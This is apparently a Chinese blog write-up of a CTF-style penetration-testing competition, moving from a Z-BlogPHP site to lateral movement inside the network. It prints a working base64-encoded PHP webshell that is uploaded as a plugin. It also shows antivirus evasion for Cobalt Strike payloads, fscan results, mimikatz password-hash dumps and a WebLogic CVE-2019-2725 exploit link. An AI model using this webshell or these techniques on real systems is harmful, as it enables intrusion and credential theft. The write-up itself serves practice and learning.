由外网打点到内网横向 | 风尘孤狼

风尘孤狼

知识型学习记录

0%

由外网打点到内网横向

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 8.1k 阅读时长 ≈ 7 分钟

image-20230127183335630

前言

2023年新年的一个渗透测试新年小比赛,来打着练练手,最终只完成了这些,想看官方讲解学习一下来着,结果官方是个买课呢,清高不理人[ps:你清高,你了不起],放博客里面记录一下吧

gogogo

刚开始只给了一个web站点Good Luck To You! - 弱鸡 (ruoji.info)

第一个flag–外网打点

第一个flag就是签到题,当时图忘记留了,就是直接就给出flag了

image-20230124203701067

image-20230124203945262

Z-BlogPHP 1.7.2CMS,后台路径是zb_system/login.php

image-20230124204243445

测试没有sql注入,dir扫一下

image-20230124204400876

得到后台账号密码是admin123:admin!@#45admin

登陆后台,主题管理可以上传zba文件getshell

image-20230124204840067

image-20230124204941349

image-20230124205137714

1 plugin ./plugin/hzy.php PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCXNlc3Npb25fd3JpdGVfY2xvc2UoKTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pgo=

访问http://www.ruoji.info/zb_users/plugin/hzy.php即可,连接getshell

image-20230124214614525

image-20230124214936949

第二个flag–内网渗透

得到第二个flag

flag{加入星球获取更多渗透技巧}

image-20230124215106732

乍一看,是windows系统,上传cs马发现有火绒,需要免杀绕一下

image-20230124215214449

C盘下面还有个tips.txt

image-20230124215320771

密码
#登陆方式:
ip=192.168.1.129
port=7001
protocol=http
username=admin123
password=c8aZaU

CS简单做个免杀套个壳改一下特征码即可实现绕火绒,上传上去之后cs上线

这地方到后面几天,免杀也不行了,虽说上传上去了但是运行不上线,用powershell进行上线

上传fscan进行内网探测

fscan.exe -h 192.168.1.0/24 -o res.txt
fscan.exe -h 192.168.3.0/24 -o res.txt

192.168.1.1:8080 open
192.168.1.129:445 open
192.168.1.129:22 open
192.168.1.129:80 open
192.168.1.133:80 open
192.168.1.4:445 open
192.168.1.1:80 open
192.168.1.129:6379 open
192.168.1.129:139 open
192.168.1.3:7890 open
192.168.1.4:135 open
192.168.1.133:445 open
192.168.1.137:21 open
192.168.1.133:7680 open
192.168.1.4:139 open
192.168.1.129:7001 open
192.168.1.1:445 open
192.168.1.136:445 open
192.168.1.137:22 open
192.168.1.129:1433 open
192.168.1.137:80 open
192.168.1.133:3306 open
192.168.1.129:3306 open
192.168.1.129:9200 open
192.168.1.129:9000 open
192.168.1.136:7001 open
192.168.1.136:139 open
192.168.1.133:139 open
192.168.1.136:135 open
192.168.1.133:135 open
192.168.1.129:135 open
192.168.1.137:3306 open
192.168.1.137:888 open
192.168.1.129:8081 open
192.168.1.129:8888 open
NetInfo:
[]192.168.1.133
[->]DESKTOP-48IQAVS
[->]192.168.1.133
[->]192.168.243.135
NetInfo:
[]192.168.1.136
[->]weblogic
[->]192.168.3.132
[->]192.168.1.136
NetInfo:
[]192.168.1.4
[->]LAPTOP-S6MRVA7U
[->]192.168.86.1
[->]192.168.58.1
[->]192.168.128.1
[->]192.168.93.1
[->]192.168.239.1
[->]192.168.3.1
[->]172.16.250.1
[->]192.168.132.1
[->]192.168.137.1
[->]192.168.1.4
[] WebTitle:http://192.168.1.137:888 code:403 len:263 title:403 Forbidden
[+] 192.168.1.133 CVE-2020-0796 SmbGhost Vulnerable
[] 192.168.1.136 WORKGROUP\WEBLOGIC Windows Server 2012 R2 Datacenter 9600
[] WebTitle:http://192.168.1.136:7001 code:404 len:1164 title:Error 404–Not Found
[] 192.168.1.4 WORKGROUP\LAPTOP-S6MRVA7U
[+] InfoScan:http://192.168.1.136:7001 [weblogic]
[] WebTitle:http://192.168.1.1:8080 code:404 len:1365 title:Error 404 NOT_FOUND
[] WebTitle:http://192.168.1.129:8081 code:200 len:0 title:None
[] WebTitle:http://192.168.1.129:7001 code:200 len:38 title:Oracle WebLogic Server 管理控制台 #蜜罐
[] WebTitle:http://192.168.1.129:9200 code:200 len:369 title:None
[] WebTitle:http://192.168.1.129 code:200 len:20 title:Apache Tomcat/8.5.15
[] WebTitle:http://192.168.1.129:8888 code:200 len:32 title:宝塔面板·腾讯云专享版#蜜罐
[ ] WebTitle:http://192.168.1.137 code:200 len:7 title:Laravel
[+] http://192.168.1.136:7001 poc-yaml-weblogic-cve-2019-2725
[] WebTitle:http://192.168.1.3:7890 code:401 len:447 title:None #蜜罐嫌疑
[] WebTitle:http://192.168.1.129:9000 code:200 len:20 title:Coremail邮件系统
[] WebTitle:http://192.168.1.1 code:200 len:8354 title:GM220-S #路由器
[+] InfoScan:http://192.168.1.3:7890 [Shiro]
[+] InfoScan:http://192.168.1.137 [Laravel]
[*] WebTitle:http://192.168.1.133 code:200 len:25 title:弱鸡 _Good Luck To You! #外网对应内网地址
[+] SSH:192.168.1.129:22:root root #蜜罐

192.168.243.135:3306 open
192.168.243.135:135 open
192.168.243.135:80 open
192.168.243.135:7680 open
192.168.243.135:139 open
192.168.243.135:445 open
NetInfo:
[]192.168.243.135
[->]DESKTOP-48IQAVS
[->]192.168.1.133
[->]192.168.243.135
[+] 192.168.243.135 CVE-2020-0796 SmbGhost Vulnerable
[] WebTitle:http://192.168.243.135 code:200 len:25 title:弱鸡 _Good Luck To You!

129几乎全是蜜罐

第三个flag-内网横向

cs上线

image-20230127113934068

抓取密码 -logonpasswords

Authentication Id : 0 ; 506030 (00000000:0007b8ae)
Session : Interactive from 1
User Name : 123456
Domain : DESKTOP-48IQAVS
Logon Server : DESKTOP-48IQAVS
Logon Time : 2023/1/27 10:50:44
SID : S-1-5-21-3476115144-3521791377-3233357206-1001
msv :
[00000003] Primary

  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • NTLM : 32ed87bdb5fdc5e9cba88547376818d4
  • SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
    tspkg :
    wdigest :
  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • Password : (null)
    kerberos :
  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • Password : (null)
    ssp : KO
    credman :

Authentication Id : 0 ; 505975 (00000000:0007b877)
Session : Interactive from 1
User Name : 123456
Domain : DESKTOP-48IQAVS
Logon Server : DESKTOP-48IQAVS
Logon Time : 2023/1/27 10:50:44
SID : S-1-5-21-3476115144-3521791377-3233357206-1001
msv :
[00000003] Primary

  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • NTLM : 32ed87bdb5fdc5e9cba88547376818d4
  • SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
    tspkg :
    wdigest :
  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • Password : (null)
    kerberos :
  • Username : 123456
  • Domain : DESKTOP-48IQAVS
  • Password : (null)
    ssp : KO
    credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/1/27 10:43:26
SID : S-1-5-19
msv :
tspkg :
wdigest :

  • Username : (null)
  • Domain : (null)
  • Password : (null)
    kerberos :
  • Username : (null)
  • Domain : (null)
  • Password : (null)
    ssp : KO
    credman :

Authentication Id : 0 ; 80714 (00000000:00013b4a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/1/27 10:43:24
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
    ssp : KO
    credman :

Authentication Id : 0 ; 80682 (00000000:00013b2a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/1/27 10:43:24
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
    ssp : KO
    credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DESKTOP-48IQAVS$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/27 10:43:16
SID : S-1-5-20
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
  • Username : desktop-48iqavs$
  • Domain : WORKGROUP
  • Password : (null)
    ssp : KO
    credman :

Authentication Id : 0 ; 56317 (00000000:0000dbfd)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/1/27 10:43:03
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
    ssp : KO
    credman :

Authentication Id : 0 ; 56318 (00000000:0000dbfe)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/1/27 10:43:03
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
    ssp : KO
    credman :

Authentication Id : 0 ; 55168 (00000000:0000d780)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/1/27 10:42:43
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp : KO
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DESKTOP-48IQAVS$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/1/27 10:42:38
SID : S-1-5-18
msv :
tspkg :
wdigest :

  • Username : DESKTOP-48IQAVS$
  • Domain : WORKGROUP
  • Password : (null)
    kerberos :
  • Username : desktop-48iqavs$
  • Domain : WORKGROUP
  • Password : (null)
    ssp : KO
    credman :

内网横向探测

image-20230127114734413

192.168.243.161

192.168.1.129:445 open
192.168.1.143:139 open
192.168.1.133:139 open
192.168.1.129:139 open
192.168.1.133:135 open
192.168.1.129:135 open
192.168.1.133:80 open
192.168.1.129:80 open
192.168.1.129:22 open
192.168.1.129:6379 open
192.168.1.133:3306 open
192.168.1.129:7001 open
192.168.1.129:9000 open
192.168.1.129:9200 open
192.168.1.129:1433 open
192.168.1.133:7680 open
192.168.1.143:135 open
192.168.1.133:445 open
192.168.1.143:445 open
192.168.1.129:3306 open
192.168.1.129:8081 open
192.168.1.129:8888 open

weblogic Oracle WebLogic Server 管理控制台 存在CVE-2019-2725

https://github.com/TopScrew/CVE-2019-2725

image-20230125152820966

flag:20438912

发现蜜罐

[+] SSH:192.168.1.129:22:root root

这个ssh服务练上去之后发现是蜜罐

image-20230127132802270

上面发现的C盘下的tips.txt地址是weblogic服务也是蜜罐,真实的地址是192.168.1.136:7001

制作不易,如若感觉写的不错,欢迎打赏